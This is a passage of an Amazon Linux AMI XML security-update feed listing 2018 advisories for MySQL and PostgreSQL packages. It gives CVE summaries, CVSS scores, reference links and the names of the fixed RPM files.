href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174" title="" id="CVE-2018-3174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3185" title="" id="CVE-2018-3185" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3187" title="" id="CVE-2018-3187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3200" title="" id="CVE-2018-3200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3247" title="" id="CVE-2018-3247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3251" title="" id="CVE-2018-3251" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3276" title="" id="CVE-2018-3276" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3277" title="" id="CVE-2018-3277" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3278" title="" id="CVE-2018-3278" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282" title="" id="CVE-2018-3282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3283" title="" id="CVE-2018-3283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3284" title="" id="CVE-2018-3284" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.24" release="1.10.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-embedded-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.24" release="1.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-test-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.24-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1115</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1115: medium priority package update for mysql56</title><issued date="2018-12-06 00:38:00" /><updated date="2018-12-07 01:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3282:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640322:
CVE-2018-3282 mysql: Server: Storage Engines unspecified vulnerability (CPU Oct 2018)
CVE-2018-3278:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: RBR). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640320:
CVE-2018-3278 mysql: Server: RBR unspecified vulnerability (CPU Oct 2018)
CVE-2018-3276:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640307:
CVE-2018-3276 mysql: Server: Memcached unspecified vulnerability (CPU Oct 2018)
CVE-2018-3251:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640335:
CVE-2018-3251 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3247:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Merge). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640317:
CVE-2018-3247 mysql: Server: Merge unspecified vulnerability (CPU Oct 2018)
CVE-2018-3174:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H).
1640321:
CVE-2018-3174 mysql: Init script calling kill with root privileges using pid from pidfile owned by mysql user (CPU Oct 2018)
CVE-2018-3156:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640318:
CVE-2018-3156 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3143:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640332:
CVE-2018-3143 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3133:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640331:
CVE-2018-3133 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2016-9843:
The crc32_big function in crc32.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact via vectors involving big-endian CRC calculation.
1402351:
CVE-2016-9843 zlib: Big-endian out-of-bounds pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843" title="" id="CVE-2016-9843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3133" title="" id="CVE-2018-3133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3143" title="" id="CVE-2018-3143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3156" title="" id="CVE-2018-3156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174" title="" id="CVE-2018-3174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3247" title="" id="CVE-2018-3247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3251" title="" id="CVE-2018-3251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3276" title="" id="CVE-2018-3276" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3278" title="" id="CVE-2018-3278" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282" title="" id="CVE-2018-3282" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.42" release="1.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-embedded-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.42" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-errmsg-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.42-1.31.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.42" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.42-1.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1116</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1116: medium priority package update for mysql55</title><issued date="2018-12-06 00:40:00" /><updated date="2018-12-07 01:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3282:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640322:
CVE-2018-3282 mysql: Server: Storage Engines unspecified vulnerability (CPU Oct 2018)
CVE-2018-3174:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H).
1640321:
CVE-2018-3174 mysql: Init script calling kill with root privileges using pid from pidfile owned by mysql user (CPU Oct 2018)
CVE-2018-3133:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640331:
CVE-2018-3133 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2016-9843:
The crc32_big function in crc32.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact via vectors involving big-endian CRC calculation.
1402351:
CVE-2016-9843 zlib: Big-endian out-of-bounds pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843" title="" id="CVE-2016-9843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3133" title="" id="CVE-2018-3133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174" title="" id="CVE-2018-3174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282" title="" id="CVE-2018-3282" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.62" release="1.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql-config-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.62" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.62-1.23.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.62-1.23.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.62-1.23.amzn1.i686.rpm</filename></package><package 
name="mysql55-embedded-devel" version="5.5.62" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.62-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1117</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1117: important priority package update for postgresql93 postgresql94</title><issued date="2018-12-06 16:55:00" /><updated date="2018-12-07 01:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10915:
A vulnerability was found in libpq, the default PostgreSQL client library where libpq failed to properly reset its internal state between connections. If an affected version of libpq were used with &quot;host&quot; or &quot;hostaddr&quot; connection parameters from untrusted input, attackers could bypass client-side connection security features, obtain access to higher privileged connections or potentially cause other impact through SQL injection, by causing the PQescape() functions to malfunction.
1609891:
CVE-2018-10915 postgresql: Certain host connection parameters defeat client-side security defenses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10915" title="" id="CVE-2018-10915" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-server" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.20" release="1.76.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.20-1.76.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.20" release="1.76.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.20" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.20-1.76.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.25-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.72.amzn1" epoch="0" 